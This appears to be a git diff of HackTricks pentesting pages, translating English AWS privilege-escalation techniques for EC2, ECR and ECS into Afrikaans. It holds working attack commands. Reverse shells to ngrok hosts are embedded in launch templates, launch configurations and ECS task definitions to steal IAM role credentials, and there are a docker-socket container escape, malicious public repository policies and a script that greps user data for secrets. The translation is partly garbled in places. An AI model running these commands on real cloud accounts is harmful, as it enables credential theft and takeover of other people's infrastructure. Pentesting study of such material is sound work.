@@ -171,125 +154,110 @@ printf $TEXT | base64 > "$TEXT_PATH" aws ec2 stop-instances --instance-ids $INSTANCE_ID aws ec2 modify-instance-attribute \ - --instance-id="$INSTANCE_ID" \ - --attribute userData \ - --value file://$TEXT_PATH +--instance-id="$INSTANCE_ID" \ +--attribute userData \ +--value file://$TEXT_PATH aws ec2 start-instances --instance-ids $INSTANCE_ID ``` - -**Potential Impact:** Direct privesc to any EC2 IAM Role attached to a created instance. +**PotensiĂ«le Impak:** Direkte privesc na enige EC2 IAM Rol wat aan 'n geskepte instansie geheg is. ### `ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`,`ec2:ModifyLaunchTemplate` -An attacker with the permissions **`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`and `ec2:ModifyLaunchTemplate`** can create a **new Launch Template version** with a **rev shell in** the **user data** and **any EC2 IAM Role on it**, change the default version, and **any Autoscaler group** **using** that **Launch Templat**e that is **configured** to use the **latest** or the **default version** will **re-run the instances** using that template and will execute the rev shell. - +'n Aanvaller met die toestemmings **`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`en `ec2:ModifyLaunchTemplate`** kan 'n **nuwe Launch Template weergawe** met 'n **rev shell in** die **gebruikersdata** en **enige EC2 IAM Rol daarop** skep, die standaard weergawe verander, en **enige Autoscaler groep** **wat** daardie **Launch Template** gebruik wat **gekonfigureer** is om die **nuutste** of die **standaard weergawe** te gebruik, sal die **instansies** weer **herbegin** met behulp van daardie template en die rev shell uitvoer. 
```bash REV=$(printf '#!/bin/bash curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash ' | base64) aws ec2 create-launch-template-version \ - --launch-template-name bad_template \ - --launch-template-data "{\"ImageId\": \"ami-0c1bc246476a5572b\", \"InstanceType\": \"t3.micro\", \"IamInstanceProfile\": {\"Name\": \"ecsInstanceRole\"}, \"UserData\": \"$REV\"}" +--launch-template-name bad_template \ +--launch-template-data "{\"ImageId\": \"ami-0c1bc246476a5572b\", \"InstanceType\": \"t3.micro\", \"IamInstanceProfile\": {\"Name\": \"ecsInstanceRole\"}, \"UserData\": \"$REV\"}" aws ec2 modify-launch-template \ - --launch-template-name bad_template \ - --default-version 2 +--launch-template-name bad_template \ +--default-version 2 ``` - -**Potential Impact:** Direct privesc to a different EC2 role. +**PotensiĂ«le Impak:** Direkte privesc na 'n ander EC2-rol. ### `autoscaling:CreateLaunchConfiguration`, `autoscaling:CreateAutoScalingGroup`, `iam:PassRole` -An attacker with the permissions **`autoscaling:CreateLaunchConfiguration`,`autoscaling:CreateAutoScalingGroup`,`iam:PassRole`** can **create a Launch Configuration** with an **IAM Role** and a **rev shell** inside the **user data**, then **create an autoscaling group** from that config and wait for the rev shell to **steal the IAM Role**. - +'n Aanvaller met die toestemmings **`autoscaling:CreateLaunchConfiguration`,`autoscaling:CreateAutoScalingGroup`,`iam:PassRole`** kan **'n Launch Configuration** met 'n **IAM Rol** en 'n **rev shell** binne die **gebruikersdata** skep, dan **'n autoscaling-groep** uit daardie konfigurasie skep en wag vir die rev shell om **die IAM Rol** te **steel**. 
```bash aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-launch-configuration \ - --launch-configuration-name bad_config \ - --image-id ami-0c1bc246476a5572b \ - --instance-type t3.micro \ - --iam-instance-profile EC2-CloudWatch-Agent-Role \ - --user-data "$REV" +--launch-configuration-name bad_config \ +--image-id ami-0c1bc246476a5572b \ +--instance-type t3.micro \ +--iam-instance-profile EC2-CloudWatch-Agent-Role \ +--user-data "$REV" aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-auto-scaling-group \ - --auto-scaling-group-name bad_auto \ - --min-size 1 --max-size 1 \ - --launch-configuration-name bad_config \ - --desired-capacity 1 \ - --vpc-zone-identifier "subnet-e282f9b8" +--auto-scaling-group-name bad_auto \ +--min-size 1 --max-size 1 \ +--launch-configuration-name bad_config \ +--desired-capacity 1 \ +--vpc-zone-identifier "subnet-e282f9b8" ``` - -**Potential Impact:** Direct privesc to a different EC2 role. +**PotensiĂ«le Impak:** Direkte privesc na 'n ander EC2-rol. ### `!autoscaling` -The set of permissions **`ec2:CreateLaunchTemplate`** and **`autoscaling:CreateAutoScalingGroup`** **aren't enough to escalate** privileges to an IAM role because in order to attach the role specified in the Launch Configuration or in the Launch Template **you need to permissions `iam:PassRole`and `ec2:RunInstances`** (which is a known privesc). +Die stel van toestemmings **`ec2:CreateLaunchTemplate`** en **`autoscaling:CreateAutoScalingGroup`** **is nie genoeg om** bevoegdhede na 'n IAM-rol te verhoog nie, omdat jy om die rol wat in die Launch Configuration of in die Launch Template gespesifiseer is aan te heg **jy die toestemmings `iam:PassRole` en `ec2:RunInstances`** benodig (wat 'n bekende privesc is). ### `ec2-instance-connect:SendSSHPublicKey` -An attacker with the permission **`ec2-instance-connect:SendSSHPublicKey`** can add an ssh key to a user and use it to access it (if he has ssh access to the instance) or to escalate privileges. 
- +'n Aanvaller met die toestemming **`ec2-instance-connect:SendSSHPublicKey`** kan 'n ssh-sleutel aan 'n gebruiker voeg en dit gebruik om toegang te verkry (as hy ssh-toegang tot die instansie het) of om bevoegdhede te verhoog. ```bash aws ec2-instance-connect send-ssh-public-key \ - --instance-id "$INSTANCE_ID" \ - --instance-os-user "ec2-user" \ - --ssh-public-key "file://$PUBK_PATH" +--instance-id "$INSTANCE_ID" \ +--instance-os-user "ec2-user" \ +--ssh-public-key "file://$PUBK_PATH" ``` - -**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances. +**PotensiĂ«le Impak:** Direkte privesc na die EC2 IAM rolle wat aan lopende instansies gekoppel is. ### `ec2-instance-connect:SendSerialConsoleSSHPublicKey` -An attacker with the permission **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** can **add an ssh key to a serial connection**. If the serial is not enable, the attacker needs the permission **`ec2:EnableSerialConsoleAccess` to enable it**. - -In order to connect to the serial port you also **need to know the username and password of a user** inside the machine. +'n Aanvaller met die toestemming **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** kan **'n ssh-sleutel by 'n seriĂ«le verbinding voeg**. As die seriĂ«le nie geaktiveer is nie, het die aanvaller die toestemming **`ec2:EnableSerialConsoleAccess` nodig om dit te aktiveer**. +Om met die seriĂ«le poort te verbind, moet jy ook **die gebruikersnaam en wagwoord van 'n gebruiker** binne die masjien weet. 
```bash aws ec2 enable-serial-console-access aws ec2-instance-connect send-serial-console-ssh-public-key \ - --instance-id "$INSTANCE_ID" \ - --serial-port 0 \ - --region "eu-west-1" \ - --ssh-public-key "file://$PUBK_PATH" +--instance-id "$INSTANCE_ID" \ +--serial-port 0 \ +--region "eu-west-1" \ +--ssh-public-key "file://$PUBK_PATH" ssh -i /tmp/priv $INSTANCE_ID.port0@serial-console.ec2-instance-connect.eu-west-1.aws ``` +Hierdie manier is nie so nuttig vir privesc nie, aangesien jy 'n gebruikersnaam en wagwoord moet weet om dit te benut. -This way isn't that useful to privesc as you need to know a username and password to exploit it. - -**Potential Impact:** (Highly unprovable) Direct privesc to the EC2 IAM roles attached to running instances. +**PotensiĂ«le Impak:** (Hooglik onbewysbaar) Direkte privesc na die EC2 IAM rolle wat aan lopende instansies gekoppel is. ### `describe-launch-templates`,`describe-launch-template-versions` -Since launch templates have versioning, an attacker with **`ec2:describe-launch-templates`** and **`ec2:describe-launch-template-versions`** permissions could exploit these to discover sensitive information, such as credentials present in user data. To accomplish this, the following script loops through all versions of the available launch templates: - +Aangesien lanseringsjablone weergawebeheer het, kan 'n aanvaller met **`ec2:describe-launch-templates`** en **`ec2:describe-launch-template-versions`** regte hierdie benut om sensitiewe inligting te ontdek, soos akrediteer wat in gebruikersdata teenwoordig is. 
Om dit te bereik, loop die volgende skrip deur alle weergawes van die beskikbare lanseringsjablone: ```bash for i in $(aws ec2 describe-launch-templates --region us-east-1 | jq -r '.LaunchTemplates[].LaunchTemplateId') do - echo "[*] Analyzing $i" - aws ec2 describe-launch-template-versions --launch-template-id $i --region us-east-1 | jq -r '.LaunchTemplateVersions[] | "\(.VersionNumber) \(.LaunchTemplateData.UserData)"' | while read version userdata - do - echo "VersionNumber: $version" - echo "$userdata" | base64 -d - echo - done | grep -iE "aws_|password|token|api" +echo "[*] Analyzing $i" +aws ec2 describe-launch-template-versions --launch-template-id $i --region us-east-1 | jq -r '.LaunchTemplateVersions[] | "\(.VersionNumber) \(.LaunchTemplateData.UserData)"' | while read version userdata +do +echo "VersionNumber: $version" +echo "$userdata" | base64 -d +echo +done | grep -iE "aws_|password|token|api" done ``` +In die bogenoemde opdragte, alhoewel ons sekere patrone spesifiseer (`aws_|password|token|api`), kan jy 'n ander regex gebruik om ander tipes sensitiewe inligting te soek. -In the above commands, although we're specifying certain patterns (`aws_|password|token|api`), you can use a different regex to search for other types of sensitive information. +As ons `aws_access_key_id` en `aws_secret_access_key` vind, kan ons hierdie akrediteerlinge gebruik om by AWS aan te meld. -Assuming we find `aws_access_key_id` and `aws_secret_access_key`, we can use these credentials to authenticate to AWS. +**PotensiĂ«le Impak:** Direkte voorregverhoging na IAM gebruiker(s). -**Potential Impact:** Direct privilege escalation to IAM user(s). - -## References +## Verwysings - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) {{#include ../../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md index fd4686edb..a82053546 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md @@ -6,21 +6,21 @@ ### `ecr:GetAuthorizationToken`,`ecr:BatchGetImage` -An attacker with the **`ecr:GetAuthorizationToken`** and **`ecr:BatchGetImage`** can login to ECR and download images. +'n Aanvaller met die **`ecr:GetAuthorizationToken`** en **`ecr:BatchGetImage`** kan inlog op ECR en beelde aflaai. -For more info on how to download images: +Vir meer inligting oor hoe om beelde af te laai: {{#ref}} ../aws-post-exploitation/aws-ecr-post-exploitation.md {{#endref}} -**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic. +**PotensiĂ«le Impak:** Indirekte privesc deur sensitiewe inligting in die verkeer te onderskep. ### `ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart` -An attacker with the all those permissions **can login to ECR and upload images**. This can be useful to escalate privileges to other environments where those images are being used. +'n Aanvaller met al daardie toestemmings **kan inlog op ECR en beelde oplaai**. Dit kan nuttig wees om voorregte na ander omgewings te eskaleer waar daardie beelde gebruik word. -To learn how to upload a new image/update one, check: +Om te leer hoe om 'n nuwe beeld op te laai/op te dateer, kyk: {{#ref}} ../aws-services/aws-eks-enum.md 
@@ -28,85 +28,73 @@ To learn how to upload a new image/update one, check: ### `ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart` -Like the previous section, but for public repositories. +Soos die vorige afdeling, maar vir openbare repositories. ### `ecr:SetRepositoryPolicy` -An attacker with this permission could **change** the **repository** **policy** to grant himself (or even everyone) **read/write access**.\ -For example, in this example read access is given to everyone. - +'n Aanvaller met hierdie toestemming kan die **repository** **beleid** **verander** om homself (of selfs almal) **lees/skryf toegang** te gee.\ +Byvoorbeeld, in hierdie voorbeeld word lees toegang aan almal gegee. ```bash aws ecr set-repository-policy \ - --repository-name \ - --policy-text file://my-policy.json +--repository-name \ +--policy-text file://my-policy.json ``` - -Contents of `my-policy.json`: - +Inhoud van `my-policy.json`: ```json { - "Version": "2008-10-17", - "Statement": [ - { - "Sid": "allow public pull", - "Effect": "Allow", - "Principal": "*", - "Action": [ - "ecr:BatchCheckLayerAvailability", - "ecr:BatchGetImage", - "ecr:GetDownloadUrlForLayer" - ] - } - ] +"Version": "2008-10-17", +"Statement": [ +{ +"Sid": "allow public pull", +"Effect": "Allow", +"Principal": "*", +"Action": [ +"ecr:BatchCheckLayerAvailability", +"ecr:BatchGetImage", +"ecr:GetDownloadUrlForLayer" +] +} +] } ``` - ### `ecr-public:SetRepositoryPolicy` -Like the previoous section, but for public repositories.\ -An attacker can **modify the repository policy** of an ECR Public repository to grant unauthorized public access or to escalate their privileges. 
- +Soos die vorige afdeling, maar vir openbare repositories.\ +'n Aanvaller kan **die repository-beleid** van 'n ECR Openbare repository wysig om ongeoorloofde openbare toegang te verleen of om hul voorregte te verhoog. ```bash bashCopy code# Create a JSON file with the malicious public repository policy echo '{ - "Version": "2008-10-17", - "Statement": [ - { - "Sid": "MaliciousPublicRepoPolicy", - "Effect": "Allow", - "Principal": "*", - "Action": [ - "ecr-public:GetDownloadUrlForLayer", - "ecr-public:BatchGetImage", - "ecr-public:BatchCheckLayerAvailability", - "ecr-public:PutImage", - "ecr-public:InitiateLayerUpload", - "ecr-public:UploadLayerPart", - "ecr-public:CompleteLayerUpload", - "ecr-public:DeleteRepositoryPolicy" - ] - } - ] +"Version": "2008-10-17", +"Statement": [ +{ +"Sid": "MaliciousPublicRepoPolicy", +"Effect": "Allow", +"Principal": "*", +"Action": [ +"ecr-public:GetDownloadUrlForLayer", +"ecr-public:BatchGetImage", +"ecr-public:BatchCheckLayerAvailability", +"ecr-public:PutImage", +"ecr-public:InitiateLayerUpload", +"ecr-public:UploadLayerPart", +"ecr-public:CompleteLayerUpload", +"ecr-public:DeleteRepositoryPolicy" +] +} +] }' > malicious_public_repo_policy.json # Apply the malicious public repository policy to the ECR Public repository aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json ``` - -**Potential Impact**: Unauthorized public access to the ECR Public repository, allowing any user to push, pull, or delete images. +**PotensiĂ«le Impak**: Onbevoegde openbare toegang tot die ECR Publieke berging, wat enige gebruiker in staat stel om beelde te stoot, te trek of te verwyder. ### `ecr:PutRegistryPolicy` -An attacker with this permission could **change** the **registry policy** to grant himself, his account (or even everyone) **read/write access**. 
- +'n Aanvaller met hierdie toestemming kan die **registrasiebeleid** **verander** om homself, sy rekening (of selfs almal) **lees/skryf toegang** te verleen. ```bash aws ecr set-repository-policy \ - --repository-name \ - --policy-text file://my-policy.json +--repository-name \ +--policy-text file://my-policy.json ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md index 4988270ab..c3a5291ef 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md @@ -4,7 +4,7 @@ ## ECS -More **info about ECS** in: +Meer **inligting oor ECS** in: {{#ref}} ../aws-services/aws-ecs-enum.md 
@@ -12,185 +12,173 @@ More **info about ECS** in: ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:RunTask` -An attacker abusing the `iam:PassRole`, `ecs:RegisterTaskDefinition` and `ecs:RunTask` permission in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**. - +'n Aanvaller wat die `iam:PassRole`, `ecs:RegisterTaskDefinition` en `ecs:RunTask` toestemming in ECS misbruik, kan **nuwe taakdefinisie** genereer met 'n **kwaadwillige houer** wat die metadata-akkrediteerings steel en **dit uitvoer**. ```bash # Generate task definition with rev shell aws ecs register-task-definition --family iam_exfiltration \ - --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \ - --network-mode "awsvpc" \ - --cpu 256 --memory 512\ - --requires-compatibilities "[\"FARGATE\"]" \ - --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]" +--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \ +--network-mode "awsvpc" \ +--cpu 256 --memory 512\ +--requires-compatibilities "[\"FARGATE\"]" \ +--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]" # Run task definition aws ecs run-task --task-definition iam_exfiltration \ - --cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \ - --launch-type FARGATE \ - --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}" +--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \ +--launch-type FARGATE \ +--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}" # Delete task definition ## You need to remove all the versions (:1 
is enough if you just created one) aws ecs deregister-task-definition --task-definition iam_exfiltration:1 ``` - -**Potential Impact:** Direct privesc to a different ECS role. +**PotensiĂ«le Impak:** Direkte privesc na 'n ander ECS-rol. ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask` -Just like in the previous example an attacker abusing the **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`** permissions in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**.\ +Net soos in die vorige voorbeeld kan 'n aanvaller wat die **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`** toestemmings in ECS misbruik **nuwe taakdefinisie** genereer met 'n **kwaadaardige houer** wat die metadata-akkrediteerlinge steel en **dit uitvoer**.\ However, in this case, a container instance to run the malicious task definition need to be. - ```bash # Generate task definition with rev shell aws ecs register-task-definition --family iam_exfiltration \ - --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \ - --network-mode "awsvpc" \ - --cpu 256 --memory 512\ - --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]" +--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \ +--network-mode "awsvpc" \ +--cpu 256 --memory 512\ +--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]" aws ecs start-task --task-definition iam_exfiltration \ - --container-instances +--container-instances # Delete task definition ## You need to remove all the versions (:1 is enough if you just created one) aws ecs deregister-task-definition --task-definition iam_exfiltration:1 ``` - 
-**Potential Impact:** Direct privesc to any ECS role. +**PotensiĂ«le Impak:** Direkte privesc na enige ECS-rol. ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, (`ecs:UpdateService|ecs:CreateService)` -Just like in the previous example an attacker abusing the **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:UpdateService`** or **`ecs:CreateService`** permissions in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it by creating a new service with at least 1 task running.** - +Net soos in die vorige voorbeeld kan 'n aanvaller wat die **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:UpdateService`** of **`ecs:CreateService`** toestemmings in ECS misbruik, **'n nuwe taakdefinisie genereer** met 'n **kwaadwillige houer** wat die metadata-akkrediteerings steel en **dit uitvoer deur 'n nuwe diens te skep met ten minste 1 taak wat loop.** ```bash # Generate task definition with rev shell aws ecs register-task-definition --family iam_exfiltration \ - --task-role-arn "$ECS_ROLE_ARN" \ - --network-mode "awsvpc" \ - --cpu 256 --memory 512\ - --requires-compatibilities "[\"FARGATE\"]" \ - --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]" +--task-role-arn "$ECS_ROLE_ARN" \ +--network-mode "awsvpc" \ +--cpu 256 --memory 512\ +--requires-compatibilities "[\"FARGATE\"]" \ +--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]" # Run the task creating a service aws ecs create-service --service-name exfiltration \ - --task-definition iam_exfiltration \ - --desired-count 1 \ - --cluster "$CLUSTER_ARN" \ - --launch-type FARGATE \ - --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", 
\"subnets\":[\"$SUBNET\"]}}" +--task-definition iam_exfiltration \ +--desired-count 1 \ +--cluster "$CLUSTER_ARN" \ +--launch-type FARGATE \ +--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}" # Run the task updating a service aws ecs update-service --cluster \ - --service \ - --task-definition +--service \ +--task-definition ``` - -**Potential Impact:** Direct privesc to any ECS role. +**PotensiĂ«le Impak:** Direkte privesc na enige ECS-rol. ### `iam:PassRole`, (`ecs:UpdateService|ecs:CreateService)` -Actually, just with those permissions it's possible to use overrides to executer arbitrary commands in a container with an arbitrary role with something like: - +Werklik, net met daardie toestemmings is dit moontlik om oorskrywings te gebruik om arbitrĂȘre opdragte in 'n houer met 'n arbitrĂȘre rol uit te voer met iets soos: ```bash aws ecs run-task \ - --task-definition "" \ - --overrides '{"taskRoleArn":"", "containerOverrides":[{"name":"","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \ - --cluster \ - --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"\"]}}" +--task-definition "" \ +--overrides '{"taskRoleArn":"", "containerOverrides":[{"name":"","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \ +--cluster \ +--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"\"]}}" ``` - -**Potential Impact:** Direct privesc to any ECS role. +**PotensiĂ«le Impak:** Direkte privesc na enige ECS rol. 
### `ecs:RegisterTaskDefinition`, **`(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`** -This scenario is like the previous ones but **without** the **`iam:PassRole`** permission.\ -This is still interesting because if you can run an arbitrary container, even if it's without a role, you could **run a privileged container to escape** to the node and **steal the EC2 IAM role** and the **other ECS containers roles** running in the node.\ -You could even **force other tasks to run inside the EC2 instance** you compromise to steal their credentials (as discussed in the [**Privesc to node section**](aws-ecs-privesc.md#privesc-to-node)). +Hierdie scenario is soos die vorige, maar **sonder** die **`iam:PassRole`** toestemming.\ +Dit is steeds interessant omdat as jy 'n arbitrĂȘre houer kan uitvoer, selfs al is dit sonder 'n rol, jy 'n **privileged container kan uitvoer om te ontsnap** na die node en die **EC2 IAM rol** en die **ander ECS houer rolle** wat in die node loop, kan **steel**.\ +Jy kan selfs **ander take dwing om binne die EC2 instance** wat jy kompromitteer te loop om hul akrediteer te steel (soos bespreek in die [**Privesc na node afdeling**](aws-ecs-privesc.md#privesc-to-node)). > [!WARNING] -> This attack is only possible if the **ECS cluster is using EC2** instances and not Fargate. - +> Hierdie aanval is slegs moontlik as die **ECS-kluster EC2** instances gebruik en nie Fargate nie. 
```bash printf '[ - { - "name":"exfil_creds", - "image":"python:latest", - "entryPoint":["sh", "-c"], - "command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""], - "mountPoints": [ - { - "readOnly": false, - "containerPath": "/var/run/docker.sock", - "sourceVolume": "docker-socket" - } - ] - } +{ +"name":"exfil_creds", +"image":"python:latest", +"entryPoint":["sh", "-c"], +"command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""], +"mountPoints": [ +{ +"readOnly": false, +"containerPath": "/var/run/docker.sock", +"sourceVolume": "docker-socket" +} +] +} ]' > /tmp/task.json printf '[ - { - "name": "docker-socket", - "host": { - "sourcePath": "/var/run/docker.sock" - } - } +{ +"name": "docker-socket", +"host": { +"sourcePath": "/var/run/docker.sock" +} +} ]' > /tmp/volumes.json aws ecs register-task-definition --family iam_exfiltration \ - --cpu 256 --memory 512 \ - --requires-compatibilities '["EC2"]' \ - --container-definitions file:///tmp/task.json \ - --volumes file:///tmp/volumes.json +--cpu 256 --memory 512 \ +--requires-compatibilities '["EC2"]' \ +--container-definitions file:///tmp/task.json \ +--volumes file:///tmp/volumes.json aws ecs run-task --task-definition iam_exfiltration \ - --cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \ - --launch-type EC2 +--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \ +--launch-type EC2 # You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell ``` - ### `ecs:ExecuteCommand`, `ecs:DescribeTasks,`**`(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`** -An attacker with the **`ecs:ExecuteCommand`, `ecs:DescribeTasks`** can **execute commands** inside a running container and exfiltrate the IAM role attached to it (you need the describe permissions because it's necessary to run `aws ecs execute-command`).\ -However, 
in order to do that, the container instance need to be running the **ExecuteCommand agent** (which by default isn't). +'n Aanvaller met die **`ecs:ExecuteCommand`, `ecs:DescribeTasks`** kan **opdragte uitvoer** binne 'n lopende houer en die IAM-rol wat daaraan gekoppel is, uitbring (jy het die beskryf toestemmings nodig omdat dit nodig is om `aws ecs execute-command` te loop).\ +E however, om dit te doen, moet die houerinstansie die **ExecuteCommand-agent** draai (wat standaard nie is nie). -Therefore, the attacker cloud try to: - -- **Try to run a command** in every running container +Daarom kan die aanvaller probeer om: +- **Probeer om 'n opdrag** in elke lopende houer uit te voer. ```bash # List enableExecuteCommand on each task for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do - echo "Cluster $cluster" - for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do - echo " Task $task" - # If true, it's your lucky day - aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand - done +echo "Cluster $cluster" +for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do +echo " Task $task" +# If true, it's your lucky day +aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand +done done # Execute a shell in a container aws ecs execute-command --interactive \ - --command "sh" \ - --cluster "$CLUSTER_ARN" \ - --task "$TASK_ARN" +--command "sh" \ +--cluster "$CLUSTER_ARN" \ +--task "$TASK_ARN" ``` +- As hy **`ecs:RunTask`** het, voer 'n taak uit met `aws ecs run-task --enable-execute-command [...]` +- As hy **`ecs:StartTask`** het, voer 'n taak uit met `aws ecs start-task --enable-execute-command [...]` +- As hy **`ecs:CreateService`** het, skep 'n diens met `aws ecs create-service --enable-execute-command [...]` +- As hy **`ecs:UpdateService`** het, werk 'n diens op met `aws ecs 
update-service --enable-execute-command [...]` -- If he has **`ecs:RunTask`**, run a task with `aws ecs run-task --enable-execute-command [...]` -- If he has **`ecs:StartTask`**, run a task with `aws ecs start-task --enable-execute-command [...]` -- If he has **`ecs:CreateService`**, create a service with `aws ecs create-service --enable-execute-command [...]` -- If he has **`ecs:UpdateService`**, update a service with `aws ecs update-service --enable-execute-command [...]` +Jy kan **voorbeelde van daardie opsies** in **vorige ECS privesc afdelings** vind. -You can find **examples of those options** in **previous ECS privesc sections**. - -**Potential Impact:** Privesc to a different role attached to containers. +**PotensiĂ«le Impak:** Privesc na 'n ander rol wat aan houers gekoppel is. ### `ssm:StartSession` -Check in the **ssm privesc page** how you can abuse this permission to **privesc to ECS**: +Kyk in die **ssm privesc bladsy** hoe jy hierdie toestemming kan misbruik om **privesc na ECS**: {{#ref}} aws-ssm-privesc.md @@ -198,7 +186,7 @@ aws-ssm-privesc.md ### `iam:PassRole`, `ec2:RunInstances` -Check in the **ec2 privesc page** how you can abuse these permissions to **privesc to ECS**: +Kyk in die **ec2 privesc bladsy** hoe jy hierdie toestemmings kan misbruik om **privesc na ECS**: {{#ref}} aws-ec2-privesc.md 
